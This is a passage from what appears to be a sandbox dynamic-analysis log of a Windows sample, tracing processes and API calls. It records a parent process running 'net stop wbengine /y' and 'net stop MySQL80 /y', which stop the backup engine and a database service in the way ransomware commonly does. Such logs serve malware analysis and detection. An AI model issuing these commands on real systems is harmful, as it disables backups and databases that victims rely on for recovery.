= "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 284 os_tid = 0x590 Thread: id = 285 os_tid = 0x178 Thread: id = 286 os_tid = 0x5b8 Thread: id = 287 os_tid = 0x53c Thread: id = 288 os_tid = 0x7b4 Thread: id = 289 os_tid = 0x834 Process: id = "120" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6b8f0000" os_pid = "0x820" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop wbengine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 293 os_tid = 0x880 Process: id = "121" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x514f8000" os_pid = "0x888" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "120" os_parent_pid = "0x820" cmd_line = "C:\\Windows\\system32\\net1 stop wbengine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 294 os_tid = 0x8f8 [0196.323] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfa80 | out: lpSystemTimeAsFileTime=0x1cfa80*(dwLowDateTime=0x3e34c120, dwHighDateTime=0x1d57a87)) [0196.323] GetCurrentProcessId () returned 0x888 [0196.323] GetCurrentThreadId () returned 0x8f8 [0196.323] GetTickCount () returned 0x116abf9 [0196.323] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfa78 | out: lpPerformanceCount=0x1cfa78*=31660734479) returned 1 [0196.323] GetModuleHandleA (lpModuleName=0x0) returned 0x490000 [0196.323] __set_app_type (_Type=0x1) [0196.323] __p__fmode () returned 0x74eb31f4 [0196.323] __p__commode () returned 0x74eb31fc [0196.323] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ffe6) returned 0x0 [0196.324] __getmainargs (in: _Argc=0x4a9064, _Argv=0x4a906c, _Env=0x4a9068, _DoWildCard=0, _StartInfo=0x4a9024 | out: _Argc=0x4a9064, _Argv=0x4a906c, _Env=0x4a9068) returned 0 [0196.324] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.324] GetConsoleOutputCP () returned 0x1b5 [0196.324] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9080 | out: lpCPInfo=0x4a9080) returned 1 [0196.324] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.327] sprintf_s (in: _DstBuf=0x1cfa38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0196.328] setlocale (category=0, locale=".437") returned="English_United States.437" [0196.330] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0196.330] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0196.330] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop wbengine /y" [0196.330] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf804, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0196.330] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x64) returned 0x623c00 [0196.330] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0196.330] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cfa08 | out: Buffer=0x1cfa08*=0x621c60) returned 0x0 [0196.330] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cfa08 | out: Buffer=0x1cfa08*=0x621c78) returned 0x0 [0196.330] _fileno (_File=0x74eb2900) returned -2 [0196.330] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0196.330] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0196.330] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0196.330] _wcsicmp (_String1="config", _String2="stop") returned -16 [0196.330] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0196.330] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0196.330] _wcsicmp (_String1="file", _String2="stop") returned -13 [0196.330] _wcsicmp (_String1="files", _String2="stop") returned -13 [0196.330] _wcsicmp (_String1="group", _String2="stop") returned -12 [0196.330] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0196.330] _wcsicmp (_String1="help", _String2="stop") returned -11 [0196.330] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0196.331] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0196.331] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0196.331] _wcsicmp (_String1="session", _String2="stop") returned -15 [0196.331] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0196.331] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0196.331] _wcsicmp (_String1="share", _String2="stop") returned -12 [0196.331] _wcsicmp (_String1="start", _String2="stop") returned -14 [0196.331] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0196.331] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0196.331] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0196.331] _wcsicmp (_String1="accounts", _String2="wbengine") returned -22 [0196.331] _wcsicmp (_String1="computer", _String2="wbengine") returned -20 [0196.331] _wcsicmp (_String1="config", _String2="wbengine") returned -20 [0196.331] _wcsicmp (_String1="continue", _String2="wbengine") returned -20 [0196.331] _wcsicmp (_String1="cont", _String2="wbengine") returned -20 [0196.331] _wcsicmp (_String1="file", _String2="wbengine") returned -17 [0196.331] _wcsicmp (_String1="files", _String2="wbengine") returned -17 [0196.331] _wcsicmp (_String1="group", _String2="wbengine") returned -16 [0196.331] _wcsicmp (_String1="groups", _String2="wbengine") returned -16 [0196.331] _wcsicmp (_String1="help", _String2="wbengine") returned -15 [0196.331] _wcsicmp (_String1="helpmsg", _String2="wbengine") returned -15 [0196.331] _wcsicmp (_String1="localgroup", _String2="wbengine") returned -11 [0196.331] _wcsicmp (_String1="pause", _String2="wbengine") returned -7 [0196.331] _wcsicmp (_String1="session", _String2="wbengine") returned -4 [0196.331] _wcsicmp (_String1="sessions", _String2="wbengine") returned -4 [0196.331] _wcsicmp (_String1="sess", _String2="wbengine") returned -4 [0196.331] _wcsicmp (_String1="share", _String2="wbengine") returned -4 [0196.331] _wcsicmp (_String1="start", _String2="wbengine") returned -4 [0196.331] _wcsicmp (_String1="stats", _String2="wbengine") returned -4 [0196.331] _wcsicmp (_String1="statistics", _String2="wbengine") returned -4 [0196.331] _wcsicmp (_String1="stop", _String2="wbengine") returned -4 [0196.331] _wcsicmp (_String1="time", _String2="wbengine") returned -3 [0196.331] _wcsicmp (_String1="user", _String2="wbengine") returned -2 [0196.331] _wcsicmp (_String1="users", _String2="wbengine") returned -2 [0196.331] _wcsicmp (_String1="msg", _String2="wbengine") returned -10 [0196.331] _wcsicmp (_String1="messenger", _String2="wbengine") returned -10 [0196.331] _wcsicmp (_String1="receiver", _String2="wbengine") returned -5 [0196.331] _wcsicmp (_String1="rcv", _String2="wbengine") returned -5 [0196.332] _wcsicmp (_String1="netpopup", _String2="wbengine") returned -9 [0196.332] _wcsicmp (_String1="redirector", _String2="wbengine") returned -5 [0196.332] _wcsicmp (_String1="redir", _String2="wbengine") returned -5 [0196.332] _wcsicmp (_String1="rdr", _String2="wbengine") returned -5 [0196.332] _wcsicmp (_String1="workstation", _String2="wbengine") returned 13 [0196.332] _wcsicmp (_String1="work", _String2="wbengine") returned 13 [0196.332] _wcsicmp (_String1="wksta", _String2="wbengine") returned 9 [0196.332] _wcsicmp (_String1="prdr", _String2="wbengine") returned -7 [0196.332] _wcsicmp (_String1="devrdr", _String2="wbengine") returned -19 [0196.332] _wcsicmp (_String1="lanmanworkstation", _String2="wbengine") returned -11 [0196.332] _wcsicmp (_String1="server", _String2="wbengine") returned -4 [0196.332] _wcsicmp (_String1="svr", _String2="wbengine") returned -4 [0196.332] _wcsicmp (_String1="srv", _String2="wbengine") returned -4 [0196.332] _wcsicmp (_String1="lanmanserver", _String2="wbengine") returned -11 [0196.332] _wcsicmp (_String1="alerter", _String2="wbengine") returned -22 [0196.332] _wcsicmp (_String1="netlogon", _String2="wbengine") returned -9 [0196.332] _wcsupr (in: _String="wbengine" | out: _String="WBENGINE") returned="WBENGINE" [0196.332] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6254b8 [0196.336] GetServiceKeyNameW (in: hSCManager=0x6254b8, lpDisplayName="WBENGINE", lpServiceName=0x4aaaf0, lpcchBuffer=0x1cf9a4 | out: lpServiceName="", lpcchBuffer=0x1cf9a4) returned 0 [0196.337] _wcsicmp (_String1="msg", _String2="WBENGINE") returned -10 [0196.337] _wcsicmp (_String1="messenger", _String2="WBENGINE") returned -10 [0196.338] _wcsicmp (_String1="receiver", _String2="WBENGINE") returned -5 [0196.338] _wcsicmp (_String1="rcv", _String2="WBENGINE") returned -5 [0196.338] _wcsicmp (_String1="redirector", _String2="WBENGINE") returned -5 [0196.338] _wcsicmp (_String1="redir", _String2="WBENGINE") returned -5 [0196.338] _wcsicmp (_String1="rdr", _String2="WBENGINE") returned -5 [0196.338] _wcsicmp (_String1="workstation", _String2="WBENGINE") returned 13 [0196.338] _wcsicmp (_String1="work", _String2="WBENGINE") returned 13 [0196.338] _wcsicmp (_String1="wksta", _String2="WBENGINE") returned 9 [0196.338] _wcsicmp (_String1="prdr", _String2="WBENGINE") returned -7 [0196.338] _wcsicmp (_String1="devrdr", _String2="WBENGINE") returned -19 [0196.338] _wcsicmp (_String1="lanmanworkstation", _String2="WBENGINE") returned -11 [0196.338] _wcsicmp (_String1="server", _String2="WBENGINE") returned -4 [0196.338] _wcsicmp (_String1="svr", _String2="WBENGINE") returned -4 [0196.338] _wcsicmp (_String1="srv", _String2="WBENGINE") returned -4 [0196.338] _wcsicmp (_String1="lanmanserver", _String2="WBENGINE") returned -11 [0196.338] _wcsicmp (_String1="alerter", _String2="WBENGINE") returned -22 [0196.338] _wcsicmp (_String1="netlogon", _String2="WBENGINE") returned -9 [0196.338] NetServiceControl (in: servername=0x0, service="WBENGINE", opcode=0x0, arg=0x0, bufptr=0x1cf9a0 | out: bufptr=0x1cf9a0) returned 0x0 [0196.339] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x1cf97c | out: Buffer=0x1cf97c*=0x627868) returned 0x0 [0196.339] OpenServiceW (hSCManager=0x6254b8, lpServiceName="WBENGINE", dwDesiredAccess=0xc) returned 0x6255d0 [0196.340] QueryServiceStatus (in: hService=0x6255d0, lpServiceStatus=0x1cf950 | out: lpServiceStatus=0x1cf950*(dwServiceType=0x10, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0196.340] GetServiceDisplayNameW (in: hSCManager=0x6254b8, lpServiceName="WBENGINE", lpDisplayName=0x4b1fc0, lpcchBuffer=0x1cf934 | out: lpDisplayName="Block Level Backup Engine Service", lpcchBuffer=0x1cf934) returned 1 [0196.340] NetApiBufferFree (Buffer=0x627868) returned 0x0 [0196.340] CloseServiceHandle (hSCObject=0x6255d0) returned 1 [0196.341] wcscpy_s (in: _Destination=0x4aa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0196.341] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0196.343] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0x4ab338, nSize=0x800, Arguments=0x4a9dd8 | out: lpBuffer="The Block Level Backup Engine Service service is not started.\r\n") returned 0x3f [0196.345] GetFileType (hFile=0x26c) returned 0x3 [0196.345] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x626270 [0196.345] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The Block Level Backup Engine Service service is not started.\r\n", cchWideChar=63, lpMultiByteStr=0x626270, cbMultiByte=126, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The Block Level Backup Engine Service service is not started.\r\n", lpUsedDefaultChar=0x0) returned 63 [0196.345] WriteFile (in: hFile=0x26c, lpBuffer=0x626270, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x1cf8a4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf8a4, lpOverlapped=0x0) returned 0 [0196.345] LocalFree (hMem=0x626270) returned 0x0 [0196.345] GetFileType (hFile=0x26c) returned 0x3 [0196.345] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x626270 [0196.345] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x626270, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nb", lpUsedDefaultChar=0x0) returned 2 [0196.345] WriteFile (in: hFile=0x26c, lpBuffer=0x626270, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf8a4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf8a4, lpOverlapped=0x0) returned 0 [0196.345] LocalFree (hMem=0x626270) returned 0x0 [0196.345] _ultow (in: _Dest=0xdc1, _Radix=1898708 | out: _Dest=0xdc1) returned="3521" [0196.345] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x4ab338, nSize=0x800, Arguments=0x4a9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0196.345] GetFileType (hFile=0x26c) returned 0x3 [0196.345] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x626270 [0196.345] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 3521.\r\n", cchWideChar=52, lpMultiByteStr=0x626270, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 3521.\r\n started.\r\n", lpUsedDefaultChar=0x0) returned 52 [0196.345] WriteFile (in: hFile=0x26c, lpBuffer=0x626270, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1cf8b0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf8b0, lpOverlapped=0x0) returned 0 [0196.345] LocalFree (hMem=0x626270) returned 0x0 [0196.345] GetFileType (hFile=0x26c) returned 0x3 [0196.345] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x626270 [0196.345] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x626270, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nb", lpUsedDefaultChar=0x0) returned 2 [0196.345] WriteFile (in: hFile=0x26c, lpBuffer=0x626270, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf8b0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf8b0, lpOverlapped=0x0) returned 0 [0196.346] LocalFree (hMem=0x626270) returned 0x0 [0196.346] NetApiBufferFree (Buffer=0x621c60) returned 0x0 [0196.346] NetApiBufferFree (Buffer=0x621c78) returned 0x0 [0196.346] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop wbengine /y" [0196.346] exit (_Code=2) Process: id = "122" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4f6f5000" os_pid = "0x3d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MySQL80 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 295 os_tid = 0x828 Process: id = "123" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x53f5c000" os_pid = "0x914" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "122" os_parent_pid = "0x3d0" cmd_line = "C:\\Windows\\system32\\net1 stop MySQL80 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 296 os_tid = 0x33c [0196.516] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cff7c | out: lpSystemTimeAsFileTime=0x2cff7c*(dwLowDateTime=0x3e53b300, dwHighDateTime=0x1d57a87)) [0196.516] GetCurrentProcessId () returned 0x914 [0196.516] GetCurrentThreadId () returned 0x33c [0196.516] GetTickCount () returned 0x116acc4 [0196.516] QueryPerformanceCounter (in: lpPerformanceCount=0x2cff74 | out: lpPerformanceCount=0x2cff74*=31680089101) returned 1 [0196.517] GetModuleHandleA (lpModuleName=0x0) returned 0x860000 [0196.517] __set_app_type (_Type=0x1) [0196.517] __p__fmode () returned 0x74eb31f4 [0196.517] __p__commode () returned 0x74eb31fc [0196.517] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x86ffe6) returned 0x0 [0196.517] __getmainargs (in: _Argc=0x879064, _Argv=0x87906c, _Env=0x879068, _DoWildCard=0, _StartInfo=0x879024 | out: _Argc=0x879064, _Argv=0x87906c, _Env=0x879068) returned 0 [0196.517] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.517] GetConsoleOutputCP () returned 0x1b5 [0196.517] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x879080 | out: lpCPInfo=0x879080) returned 1 [0196.517] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.520] sprintf_s (in: _DstBuf=0x2cff34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0196.521] setlocale (category=0, locale=".437") returned="English_United States.437" [0196.522] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0196.522] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0196.522] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MySQL80 /y" [0196.522] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cfd00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0196.522] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x62) returned 0x583c00 [0196.523] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0196.523] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cff04 | out: Buffer=0x2cff04*=0x581c60) returned 0x0 [0196.523] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cff04 | out: Buffer=0x2cff04*=0x581c78) returned 0x0 [0196.523] _fileno (_File=0x74eb2900) returned -2 [0196.523] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0196.523] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0196.523] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0196.523] _wcsicmp (_String1="config", _String2="stop") returned -16 [0196.523] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0196.523] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0196.523] _wcsicmp (_String1="file", _String2="stop") returned -13 [0196.523] _wcsicmp (_String1="files", _String2="stop") returned -13 [0196.523] _wcsicmp (_String1="group", _String2="stop") returned -12 [0196.523] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0196.523] _wcsicmp (_String1="help", _String2="stop") returned -11 [0196.523] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0196.523] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0196.523] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0196.523] _wcsicmp (_String1="session", _String2="stop") returned -15 [0196.523] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0196.524] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0196.524] _wcsicmp (_String1="share", _String2="stop") returned -12 [0196.524] _wcsicmp (_String1="start", _String2="stop") returned -14 [0196.524] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0196.524] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0196.524] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0196.524] _wcsicmp (_String1="accounts", _String2="MySQL80") returned -12 [0196.524] _wcsicmp (_String1="computer", _String2="MySQL80") returned -10 [0196.524] _wcsicmp (_String1="config", _String2="MySQL80") returned -10 [0196.524] _wcsicmp (_String1="continue", _String2="MySQL80") returned -10 [0196.524] _wcsicmp (_String1="cont", _String2="MySQL80") returned -10 [0196.524] _wcsicmp (_String1="file", _String2="MySQL80") returned -7 [0196.524] _wcsicmp (_String1="files", _String2="MySQL80") returned -7 [0196.524] _wcsicmp (_String1="group", _String2="MySQL80") returned -6 [0196.524] _wcsicmp (_String1="groups", _String2="MySQL80") returned -6 [0196.524] _wcsicmp (_String1="help", _String2="MySQL80") returned -5 [0196.524] _wcsicmp (_String1="helpmsg", _String2="MySQL80") returned -5 [0196.524] _wcsicmp (_String1="localgroup", _String2="MySQL80") returned -1 [0196.524] _wcsicmp (_String1="pause", _String2="MySQL80") returned 3 [0196.524] _wcsicmp (_String1="session", _String2="MySQL80") returned 6 [0196.524] _wcsicmp (_String1="sessions", _String2="MySQL80") returned 6 [0196.524] _wcsicmp (_String1="sess", _String2="MySQL80") returned 6 [0196.524] _wcsicmp (_String1="share", _String2="MySQL80") returned 6 [0196.524] _wcsicmp (_String1="start", _String2="MySQL80") returned 6 [0196.524] _wcsicmp (_String1="stats", _String2="MySQL80") returned 6 [0196.524] _wcsicmp (_String1="statistics", _String2="MySQL80") returned 6 [0196.524] _wcsicmp (_String1="stop", _String2="MySQL80") returned 6 [0196.524] _wcsicmp (_String1="time", _String2="MySQL80") returned 7 [0196.524] _wcsicmp (_String1="user", _String2="MySQL80") returned 8 [0196.524] _wcsicmp (_String1="users", _String2="MySQL80") returned 8 [0196.524] _wcsicmp (_String1="msg", _String2="MySQL80") returned -6 [0196.524] _wcsicmp (_String1="messenger", _String2="MySQL80") returned -20 [0196.524] _wcsicmp (_String1="receiver", _String2="MySQL80") returned 5 [0196.524] _wcsicmp (_String1="rcv", _String2="MySQL80") returned 5 [0196.524] _wcsicmp (_String1="netpopup", _String2="MySQL80") returned 1 [0196.524] _wcsicmp (_String1="redirector", _String2="MySQL80") returned 5 [0196.524] _wcsicmp (_String1="redir", _String2="MySQL80") returned 5 [0196.525] _wcsicmp (_String1="rdr", _String2="MySQL80") returned 5 [0196.525] _wcsicmp (_String1="workstation", _String2="MySQL80") returned 10 [0196.525] _wcsicmp (_String1="work", _String2="MySQL80") returned 10 [0196.525] _wcsicmp (_String1="wksta", _String2="MySQL80") returned 10 [0196.525] _wcsicmp (_String1="prdr", _String2="MySQL80") returned 3 [0196.525] _wcsicmp (_String1="devrdr", _String2="MySQL80") returned -9 [0196.525] _wcsicmp (_String1="lanmanworkstation", _String2="MySQL80") returned -1 [0196.525] _wcsicmp (_String1="server", _String2="MySQL80") returned 6 [0196.525] _wcsicmp (_String1="svr", _String2="MySQL80") returned 6 [0196.525] _wcsicmp (_String1="srv", _String2="MySQL80") returned 6 [0196.525] _wcsicmp (_String1="lanmanserver", _String2="MySQL80") returned -1 [0196.525] _wcsicmp (_String1="alerter", _String2="MySQL80") returned -12 [0196.525] _wcsicmp (_String1="netlogon", _String2="MySQL80") returned 1 [0196.525] _wcsupr (in: _String="MySQL80" | out: _String="MYSQL80") returned="MYSQL80" [0196.525] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5854b8 [0196.528] GetServiceKeyNameW (in: hSCManager=0x5854b8, lpDisplayName="MYSQL80", lpServiceName=0x87aaf0, lpcchBuffer=0x2cfea0 | out: lpServiceName="", lpcchBuffer=0x2cfea0) returned 0 [0196.528] _wcsicmp (_String1="msg", _String2="MYSQL80") returned -6 [0196.528] _wcsicmp (_String1="messenger", _String2="MYSQL80") returned -20 [0196.528] _wcsicmp (_String1="receiver", _String2="MYSQL80") returned 5 [0196.528] _wcsicmp (_String1="rcv", _String2="MYSQL80") returned 5 [0196.528] _wcsicmp (_String1="redirector", _String2="MYSQL80") returned 5 [0196.528] _wcsicmp (_String1="redir", _String2="MYSQL80") returned 5 [0196.528] _wcsicmp (_String1="rdr", _String2="MYSQL80") returned 5 [0196.528] _wcsicmp (_String1="workstation", _String2="MYSQL80") returned 10 [0196.528] _wcsicmp (_String1="work", _String2="MYSQL80") returned 10 [0196.528] _wcsicmp (_String1="wksta", _String2="MYSQL80") returned 10 [0196.528] _wcsicmp (_String1="prdr", _String2="MYSQL80") returned 3 [0196.528] _wcsicmp (_String1="devrdr", _String2="MYSQL80") returned -9 [0196.528] _wcsicmp (_String1="lanmanworkstation", _String2="MYSQL80") returned -1 [0196.528] _wcsicmp (_String1="server", _String2="MYSQL80") returned 6 [0196.528] _wcsicmp (_String1="svr", _String2="MYSQL80") returned 6 [0196.528] _wcsicmp (_String1="srv", _String2="MYSQL80") returned 6 [0196.529] _wcsicmp (_String1="lanmanserver", _String2="MYSQL80") returned -1 [0196.529] _wcsicmp (_String1="alerter", _String2="MYSQL80") returned -12 [0196.529] _wcsicmp (_String1="netlogon", _String2="MYSQL80") returned 1 [0196.529] NetServiceControl (in: servername=0x0, service="MYSQL80", opcode=0x0, arg=0x0, bufptr=0x2cfe9c | out: bufptr=0x2cfe9c) returned 0x889 [0196.540] wcscpy_s (in: _Destination=0x87a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0196.540] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0196.541] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x87b338, nSize=0x800, Arguments=0x879dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0196.542] GetFileType (hFile=0x26c) returned 0x3 [0196.542] 